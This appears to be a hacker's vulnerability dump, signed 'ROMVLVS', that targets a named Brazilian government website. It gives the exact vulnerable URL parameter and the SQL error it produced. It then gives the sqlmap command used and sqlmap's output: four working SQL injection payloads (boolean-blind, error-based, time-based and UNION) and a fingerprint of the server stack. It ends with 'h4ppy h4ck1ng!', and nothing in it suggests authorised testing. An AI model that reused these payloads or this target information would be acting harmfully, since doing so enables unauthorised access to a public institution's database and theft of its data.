--==[ Discovered by ROMVLVS ]==--
Website: www.crefono8.gov.br
Vulnerability: SQL Injection (Method GET)
Vulnerable Path: http://www.crefono8.gov.br/inscricoes.php?id=1%27
ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Using sqlmap: sqlmap --url http://www.crefono8.gov.br/inscricoes.php?id=1
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 8117=8117
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=1 AND GTID_SUBSET(CONCAT(0x7171707871,(SELECT (ELT(6079=6079,1))),0x7162707171),6079)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8580 FROM (SELECT(SLEEP(5)))EGWB)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=-6571 UNION ALL SELECT NULL,CONCAT(0x7171707871,0x44714c7556696344416a724e5541517447596171544a5669566849547144715664454d474a5a7244,0x7162707171),NULL,NULL,NULL,NULL-- -
---
[xx:xx:xx] [INFO] the back-end DBMS is MySQL
web application technology: PHP, PHP 5.4.45, Nginx
back-end DBMS: MySQL >= 5.6 (Percona fork)
--==[ h4ppy h4ck1ng! ]==--